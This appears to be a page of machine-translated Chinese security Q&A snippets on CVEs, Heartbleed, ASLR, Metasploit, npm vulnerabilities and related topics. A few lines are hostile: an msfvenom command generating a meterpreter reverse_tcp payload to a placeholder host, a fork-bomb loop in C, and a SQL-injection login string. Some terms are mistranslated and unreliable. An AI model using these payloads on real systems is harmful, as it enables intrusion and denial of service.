1回答
Iso 27K实施
、、、
假设我们购买了一个新的思科路由器或任何IT设备。我们如何在技术上采用ISO 27k/NIST 800-37/NIST 800-53或任何其他相关的信息安全管理标准?我是说我们该怎么办?我们应该安装软件来检查它的漏洞吗?或者我们应该检查一下设备是否有众所周知的漏洞,并消除它们?
提前谢谢。
浏览 0提问于2016-11-23得票数 0
回答已采纳
12月18日,公布了git和mecurial中的漏洞。
漏洞的详细信息是什么?
会影响我吗?
我该怎么办?
浏览 0提问于2014-12-21得票数 28
在启用的ASLR EXE中使用非ASLR DLL安全吗?DLL是被加载到并使用随机寻址,还是所有依赖项都应该启用ASLR?
此外,其他安全机制如DEP和SHE怎么办?
浏览 0提问于2020-09-09得票数 1
回答已采纳
访问本网站:http://ruby-doc.org/
我收到这样的信息:
在过去的14天里,有3份Ruby漏洞报告。2高,1中等。最近: CVE-2013-4562。详情见。
我安装红宝石只是为了好玩和玩它。这个弱点会影响我吗?我真的很害怕我该怎么办?
浏览 0提问于2014-05-17得票数 1
回答已采纳
1回答
FastAPI正在EC2上运行。该服务在0.0.0.0/0上发布,只有一个端口号。
有与自己的服务无关的目录名的多个访问。在这种情况下我该怎么办?
这是一个常见的事件,这是我应该关心的事情吗?
浏览 2提问于2022-11-07得票数 1
回答已采纳
几乎我在Metasploit的所有个人实验室工作都没有成功。最常见的情况是,我得到消息“利用已完成,但没有创建会话。”这事发生后我不知道该怎么办。有没有任何方法可以读取日志或发现更多关于为什么会发生这种情况的信息?
浏览 0提问于2017-10-08得票数 0
常见漏洞和暴露(CVE)系统是公开发布的软件包中公开已知的信息安全漏洞和暴露的字典。
我正在寻找以下问题的规范答案:
CVEs是如何工作的?
如何找到与特定产品相关的CVE?
我在哪里能找到简历的修补程序?
所有上市的CVEs都有修补程序吗?
如果我找不到上市简历的修补程序,我该怎么办?
我运行了一个谷歌搜索来识别、收集和查看不同产品的CVEs。结果是不同的,但我希望我们能够利用我的问题作为一个基础,用户可以从中了解CVE系统,并可以遵循一步一步的程序,以识别和收集产品CVEs。
浏览 0提问于2015-06-26得票数 2
昨天我在我的高级操作系统课上了解到,允许放在就绪队列中的进程数量是有限制的。我想知道不同操作systems.And的进程数量,以及当超过该数量时会发生什么?含义:如果创建的进程数超过这个数目,该怎么办?
我试着通过运行一个小程序来看看会发生什么,这个小程序
int main()
{
while(1)
system(fork());
return 0;
}
系统立即hung.Can任何人解释为什么我的系统挂起?
浏览 0提问于2011-08-21得票数 1
我知道,如果你使用的软件为您的网站,如wordpress,ip板等,有可能在每个软件漏洞。
但是,如果您只有一个apache服务器和一个简单的index.html,并带有非常简单的html代码,那该怎么办呢?会有漏洞吗?我之所以这么问,是因为我看到了一个看起来非常非常简单的网站,它被黑了,还有一些其他的东西,比如"Hacked .“。
浏览 0提问于2014-12-05得票数 1
回答已采纳
1回答
Xen必须在来宾操作系统内核代码中处理。
但是,如果我的用户空间代码包含这样的指令(例如,将GDT信息存储到内存中的SGDT )怎么办?我的代码还能在使用Xen准虚拟化的来宾虚拟机中顺利运行吗?它会泄露主机的GDT信息(因此会引起一些关注)吗?
此外,谁能向我展示一下来宾内核中SGDT (和其他非虚拟化指令)是如何处理的代码/细节?
浏览 11提问于2018-01-18得票数 2
回答已采纳
CVE-2014-0160 a.k.a.心血是OpenSSL中的一个漏洞。看上去很吓人。
如何确定我是否受到影响?
如果我受了影响,我该怎么办?显然升级还不够。
浏览 0提问于2014-04-08得票数 95
回答已采纳
2回答
我用的是崇高的文字。我已经安装了Linter软件包以及ccslint和htmllint。为了安装最后两个,我不得不在我的Mac上安装Node.js。
CSS和HTML指针似乎在崇高中工作得很好。
但是,当我通过在终端中键入以下内容来安装htmllint时
sudo安装-g html线索@最新
我在终点站得到了以下令人担忧的信息:
在终端输入并按回车:
npm审计固定-强制
我得到以下信息
当我安装Node时,我收到了以下消息,我不明白,也没有做任何事情。这与漏洞有关吗?如果是的话,我该怎么办?
帮助!
浏览 7提问于2022-03-08得票数 1
@Id
@GeneratedValue(strategy = GenerationType.AUTO)
private int color_id;
上面生成的是一个自动递增的数字,比如1,2,3,4,5,6。但是当我们用6删除记录时,下一个生成的数字是7。但是我希望下一个生成的数字是6。我该怎么办?我需要自动增量从6,7本身继续,不是7,8,有任何方式吗?
浏览 1提问于2014-10-30得票数 1
回答已采纳
2回答
Docker映像是在某个时间点构建的,然后由这些映像的用户获取它们,然后根据它们创建容器。看到Linux发行版(比如Ubuntu)上出现更新的频率,这不意味着图像在发布到映像存储库后的第二天就已经过时了吗?
假设有人为他们的应用程序创建了一个图像:
FROM ubuntu
RUN apt update -y # or whatever the command to update on Ubuntu is
WORKDIR /myapp
COPY ./* ./
# and some other stuff
这个应用程序有一天会被构建(从那天起使用ubuntu:latest ),所有最新的补丁都要
浏览 0提问于2022-11-05得票数 0
回答已采纳
我遇到了一个问题,在用过时的npm包引入的几百个存储库中,我有太多的漏洞。问题是,我需要找到一种优先排序的方法。对我来说,最大的痛苦是工程团队想要证明漏洞的利用,所以他们修补了这个包。
是否有任何工具可以用来检查一个易受攻击的包是否真的对应用程序构成威胁?我知道Snyk是可触及的,但它只用于Java项目,我需要一些nodejs。
浏览 0提问于2022-04-28得票数 1
1回答
作为一名安全工程师,我想知道web应用程序第三方JS依赖漏洞管理的通用方法。我们有很多应用程序依赖Jquery等,在常规的漏洞扫描中,旧版本的JS库(其中很多版本都有XSS )报告为漏洞。如果没有真正的阅读和理解代码,你就不能说你的应用程序是否会受到那些XSS的影响,这对一个安全工程师来说也不是一件容易的事情。然而,更新版本(希望没有指定的XSS CVE s)也不容易,因为它需要其他团队在应用程序上进行新的开发和QA-UX测试。我相信这是一个常见的问题。那么,什么是行业标准(由谷歌、苹果、微软等大公司应用)。
我们有这样的情况:我们将问题归类为漏洞,而不提供实际的XSS攻击。然而,由于努力,开
浏览 0提问于2021-03-01得票数 2
一年多前,我向HackerOne上的一个顶级bug奖励程序报告了一些安全漏洞。所有这些问题都被迅速列为关键问题,但在解决这些问题方面没有取得任何进展。我已经反复点击他们的更新,但每次我都收到回避的答案。程序响应效率指标似乎表明,对于其他报告,或者至少是其中的一些报告,情况并非如此。在这种情况下我该怎么办?我已经尝试过HackerOne调解系统,但没有成功。
浏览 0提问于2021-03-03得票数 2
回答已采纳
正如标题所说,我想理解:
在端口80/443上运行自定义应用程序(如节点或烧瓶)意味着什么?
从安全的角度来看,运行Nginx这样的反向代理是否是强制性的?
如果我以root用户的身份运行Nginx并在今天发现了一个安全漏洞,该怎么办?这难道不会使定制应用程序和Nginx都面临巨大的安全风险吗?
如果不是Nginx,那么处理端口80或443的最安全(也是最标准的)方法是什么?
浏览 0提问于2019-08-02得票数 1
2回答
我有数百个密码,因为我对每个网站/服务使用不同的随机密码。它们都是用KeePassX生成和存储的,可以通过dropbox (或ubuntuone)同步到不同的计算机和我的安卓手机。
我知道KeePassX的数据库是安全的(至少有一个很好的密码)。但是,当我将密码复制到剪贴板(在剪贴板中存储了5秒)时,怎么办?在用户空间中运行的任何程序可以访问剪贴板并存储密码吗?如果是的话,这有多大的安全风险?
浏览 0提问于2011-01-16得票数 12
回答已采纳
常规的msfvenom会生成二进制文件,有谁知道如何生成PE32 executable (CONSOLE)二进制文件吗?
例如:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port -f exe -o shellmet.exe
会生成一个PE32 executable (GUI)。
如果我想要一个PE32 executable (CONSOLE)可执行文件怎么办?
浏览 1提问于2017-10-24得票数 0
我的印象是,成熟的类Unix操作系统不太容易受到特洛伊木马的攻击,这主要是因为内核代码调试良好,包括正确使用硬件内存保护。对吗?
是否有任何公司或团体致力于设计硬件架构,以防止应用程序代码中的漏洞--即使操作系统不像Unix,甚至存在木马?
谢谢。
浏览 0提问于2013-06-10得票数 2
我正在运行一个Android One (即谷歌支持的普通Android )手机,其中有Android8.1。我已经解锁了引导程序并将我的设备进行了根植。
因为我的设备已经扎根,我已经有近一年无法将“系统更新”应用到我的手机上了。重新查看我看到的可用版本,新版本是Android 9,需要完全重新安装。
我意识到我真的很喜欢我的系统,我不想做任何改变,事实上,我担心一些很酷的功能可能会被禁用(比如改变MAC地址的能力,停止在预设的水平上充电手机的能力)。
来自安全POV的
,在一个过时的Android8.1版本上运行的真正风险是什么,假设我对我安装的应用程序是明智的,并且不去点击广告/垃圾邮件?
浏览 0提问于2019-08-08得票数 0
我不知道如何在Firefox和Chromium的安全模型之间得到一个知情、公正的比较。我尝试过搜索它,但我发现的只是随机新闻网站上的一些不知情的轶事,而且大多数结果都已经过时了,而且没有提到这些浏览器的当前版本。
普遍的共识似乎是,由于更好的沙箱实现,铬在安全性方面更优越,但我不知道这是否属实。这两种浏览器的安全模型有什么主要区别?
浏览 0提问于2017-01-03得票数 3
4回答
我遇到了一个漏洞,安全@微软认为不值得去追求。
我估计会有很多很多客户受到这个问题的影响。
我不想发起一场草根运动来解决这个问题,因为这会在这个过程中公布漏洞。
我该怎么办?
浏览 0提问于2010-11-20得票数 10
回答已采纳
1回答
我在不正确的子站点(security.se)上问过这个问题,但是我认为这个问题更适合这个网站。所以,我在搜索一个工具,其中包括多个漏洞扫描器,这样我们就可以上传一个项目(甚至提交我们的网站),并且这个工具扫描我们的站点(或项目)是否存在漏洞。但区别在于,它使用多个不同的扫描仪(如VirusTotal)进行扫描。
我自己做了一个想法的草图,来展示我的意思:http://allscanners.itask.software/
当我们需要这样的东西时,我们该怎么办?
浏览 0提问于2019-01-15得票数 0
1回答
根据排除或显示未运行Linux内核的漏洞.:
在单个Linux主机上检测到多个内核是可能的,Qualys将报告在所有Linux内核上发现的所有漏洞。
Linux发行版支持多个内核版本的并行安装。在安装新内核时,会自动创建一个引导项和一个initrd,因此不需要进一步的手动配置。那么,我是否真的需要关注为旧安装的内核发现的漏洞(实际上,这些漏洞并不用于引导系统)?有风险吗?我的意思是,当然有人可能会争辩说,一旦有人访问了服务器,他/她就可以引导到一个较旧的(如果你愿意的话更易受攻击)安装的内核版本,但这首先需要根权限。
浏览 0提问于2021-01-22得票数 1
回答已采纳
如果我在手机上收到短信,给出了TikTok应用的验证代码,尽管我已经删除并不再在我的安卓设备上使用这个应用程序,我该怎么办?我收到一个国际电话后,短消息弹出在我的notifications.Is,这是一个网络攻击或网络钓鱼?
浏览 0提问于2020-07-13得票数 1
我有一个ajax上传器,允许用户上传图片到程序,将显示回给用户。在允许文件留在服务器上之前,我要检查此文件是否有病毒。下面是它将文件发送到病毒扫描程序的代码。我希望能够看到扫描结果是否产生病毒,然后从服务器上删除它,如果它确实有病毒。
try
{
Process myProcess = new Process();
myProcess.StartInfo.FileName = @"C:\Program Files\AVG\AVG8\avgscanx.exe";
//myProcess.StartInfo.FileName=@"C:\Program
浏览 2提问于2011-08-04得票数 0
回答已采纳
我当时在一个有将近20万人的小组里,在电报里。其中一位成员(可能是新来的,他的帐户现在被删除了)给我(以及其他人)发送了一个名为“客户存款H.rar”的文件,我立即删除了它,并使用Kasperky Free分析了我的Android9.0手机。
如果我不打开文件,有什么可能被感染(我没有分析文件,我假设文件上有恶意软件)?
换句话说,正如标题所说,我可以从.rar文件中获得恶意软件,而不用在Android中打开它吗?
我发现了另一个问题,但总是提到Windows。
浏览 0提问于2021-04-26得票数 1
回答已采纳
1回答
这里我有一个专用服务器,内存为12 and,运行Debian x64。
dmesg | grep Memory
[ 0.004000] Memory: 11917152k/12259740k available (2279k kernel code, 333820k reserved, 1022k data, 216k init)
从几天以来,我有了另一台专用服务器(几乎相同的硬件),但是使用Debian挤压x64 (通过debootstrap安装,Kernel2.6.32-5-Xen-AMD 64)
dmesg | grep Memory
[ 1.551510] Memory:
浏览 0提问于2011-01-10得票数 1
在某些文件系统中,分配新文件时使用的块是为了避免重用。当用于稀疏文件时,这样的设置会导致文件大小不断增大。是否有一个文件系统在为新文件分配块时会尽可能地重用磁盘空间,以减缓稀疏文件的增长?
浏览 0提问于2013-12-02得票数 3
回答已采纳
浏览器遵循一定的标准来安全地呈现网页和执行脚本。但都是在浏览器里。
例如,我无法从浏览器控制台访问JS模块中的内容。
如果有一个修改过的WebKit/壁虎引擎没有遵循这样的标准,并且专门用于冒犯前端,该怎么办?这样我们就可以在前端做一些不允许的事情。
这样的浏览器存在吗?
浏览 0提问于2021-10-01得票数 0
我喜欢JSONP,在这里我们可以跨域获取信息,但是,如果有些服务不支持JSONP (因此不提供回调),该怎么办?
我需要解决这个问题。
我在想,如果我们有一个像<script id="s1" source="http://other.com/asd"></script>这样的标签,我们该如何提取s1的“内容”呢?
一开始我以为s1.innerHTML会做这个,但是很好..。很明显这不起作用。
我想知道是否有人会有他们愿意分享的“黑客”。
欢迎黑客攻击
浏览 1提问于2011-06-05得票数 1
回答已采纳
我已经看到我的系统有两种rootkits: SHV4 / SHV5。(我要在这里添加一个日志)我试图删除它,但我做不到。
有人能推荐我怎么做吗?
[ Rootkit Hunter version 1.3.8 ]
Checking system commands...
/usr/bin/md5sum [ Warning ]
/usr/bin/pstree [ Warning ]
/usr/bin/top
浏览 0提问于2013-07-19得票数 0
2回答
我理解漏洞和漏洞之间的区别,但是当我浏览漏洞数据库时,我看到了更多的漏洞和更少的漏洞。对于每个被发现的漏洞,难道不应该至少有一个漏洞被利用吗?不是所有的漏洞都可以利用吗?
我想说的是,当我在带有特定CVE ID的漏洞数据库上搜索漏洞时,无法保证可以利用该漏洞进行攻击。如果一个漏洞不能被利用,它如何被认为是一个漏洞?
浏览 0提问于2017-04-07得票数 7
回答已采纳
1回答
我知道,在大多数情况下,在安全性定义方面,在很多问题上的想法都有一些细微的差异。
我要问的是,攻击是否被认为是利用特定漏洞,还是可以说多个漏洞利用了单个漏洞。例如,我们知道SQL通过SQL注入攻击有许多类型的攻击。我们是说SQL中通过发送意外命令来操作的漏洞本身就是漏洞,还是能够执行攻击操作的特定命令就是漏洞,这意味着它是1:1而不是1:*关系?
浏览 0提问于2015-05-04得票数 0
3回答
我有一个在java 6上运行的遗留应用程序。但是,由于某些安全因素,我们需要升级到TLS 1.2。为此,我尝试了以下代码:
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URL;
import java.net.UnknownHostException;
import java.security.KeyManagementException;
import java.security.NoSuchAlgorithmExce
浏览 0提问于2017-08-29得票数 0
漏洞CVE-2016-5195处理Linux系统中的权限升级问题。
在虚拟机管理程序KVM和QEMU的虚拟环境中,虚拟机能够访问其主机吗?如果没有,这里的保护层是什么?
浏览 0提问于2016-10-25得票数 3
回答已采纳
我对Access女士有意见。问题是,我当前的MS.后端文件大小是320MB,但在我压缩数据库后,它仍然只有222MB的文件大小,所以这意味着我丢失了98MB的文件大小。我的问题是,这是什么问题?在它丢失文件大小98MB后,为什么当用户使用它时,它保持比以前更慢?文件中记录是否丢失怎么办?提前谢谢你。
浏览 4提问于2018-09-08得票数 0
,但是如果未编译源代码中的类应该从特定于项目的类(已经加载)继承,并且具有其他的项目依赖项,该怎么办?
举个例子,假设我想让软件的用户能够在运行时定制一个类。我的项目中有一个abstract public class Customizable和一个自定义class StatusDetails,并且假设用户在一个文件中编写代码,如下所示:
import com.somepackage.util.StatusDetails;
public class Test extends Customizable {
public Test(){
System.out.printl
浏览 1提问于2015-12-30得票数 0
是否有可能不在服务器上安装新程序并避免任何熔毁/幽灵漏洞,因为这只是一个新发现的问题。
我有一个运行固定数据库负载的SLES服务器。它是一个英特尔Xeon的AWS (hvm) VPC在一个私人子网。回顾一下,自从该服务器一年多前启动以来,没有任何新的程序二进制文件或进程被添加到该服务器中。但是我们已经定期使用推荐的OS/DBMS补丁(这显然带来了新代码)。
根据我到目前为止所读到的,数据库类型的工作负载将受到修复带来的巨大性能影响。它已经在高峰时间以60%-80%的cpu运行,而且还在增长,所以我希望在2-3个月内升级到一个更大的服务器。
在这种情况下,跳过修复程序有意义吗?如果是的话,这要延
浏览 0提问于2018-01-07得票数 1
回答已采纳
在我的Android游戏中,我有一些活动,其中一个有OpenGL视图。问题是,每次我在活动之间切换时,使用的堆内存不会释放,例如,在某些手机的活动之间切换10-20次后,应用程序会崩溃并关闭。
我有用于在每个活动之间切换的结构代码:
Intent it = new Intent(WorldChose.this, MainMenu.class);
startActivity(it);
overridePendingTransition(R.anim.from_middle, R.anim.to_middle);
finish();
浏览 17提问于2016-07-26得票数 1
回答已采纳
4回答
我尝试在c程序中使用系统系统调用执行Linux命令,但不希望它在终端上转储输出或错误日志。我该怎么办?有没有其他方法可以做到这一点?
浏览 0提问于2011-01-21得票数 22
撇开沙箱和AV不谈,如果我想手动查看/监视我的系统,查看它们通常进入的位置,我在哪里可以查找可能的恶意Java病毒/活动,例如,它们会首先显示在任务管理器或临时文件中吗?
有什么工具吗?
浏览 0提问于2012-12-16得票数 0
1回答
我需要帮助,了解如何管理我们的产品的安全发行说明。我们每半年都会发布我们的产品,每个月都会发布安全或维护版本。
关于我们告诉客户的安全问题,我应该考虑什么?
我们应该告诉他们我们升级了我们的第三方软件吗?,例如,我们应该告诉他们我们升级了Apache服务器版本吗?
我们应该列出Apache、中修复的漏洞,还是足够链接到Apache站点的漏洞?
我们应该管理带有版本的3D派对软件的列表吗?
我们的内部安全漏洞怎么办?应该列出固定安全漏洞的列表吗?这可能会危及那些不会升级到最新版本的客户。
我们应该如何公布安全漏洞呢?应该将我们的公司作为http://cve.mitre.org/数据库的供应商添加
浏览 0提问于2013-12-23得票数 6
回答已采纳
我正在研究Internet安全性,并且我了解了一些关于在旧网站中注入代码的知识(使用字符串' OR 1 == 1 //作为用户名登录,并提供任何密码);但是,如果与用户名相关的密码存储在具有以下路径的文件夹中的服务器中怎么办:
/userdata/passwords/<username>
不知道任何合法的用户名或密码就能登录到系统中的凭据?
此外,在这个问题中,它指定登录系统安装在运行操作系统的计算机上,并且该操作系统已知在/system/version.txt中有一个带有其版本(在本例中为1.0.3)的文件。
老实说,我不知道最后一件事与这个问题有什么关系,但我希望有人能
浏览 0提问于2020-07-03得票数 0
1回答
我有点困惑于qcow2文件的真实大小。
ls -alh VMs/ubuntu-mini.qcow2
-rw------- 1 root root 21G mar 31 23:15 VMs/ubuntu-mini.qcow2
du -h VMs/ubuntu-mini.qcow2
2,7G VMs/ubuntu-mini.qcow2
我想将该文件复制到不同的分区(ext4)。看起来,这个命令实际上复制了21G,而不是我所期望的2,7G。现在,在新的位置,这两个命令(du和ls)向我展示了相同的大小- 21G。
du -h /media/HDD0/VMs/ubuntu-mini.qcow2
浏览 0提问于2018-04-04得票数 8
回答已采纳
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
即时通信 IM
腾讯会议活动推荐
腾讯云开发者
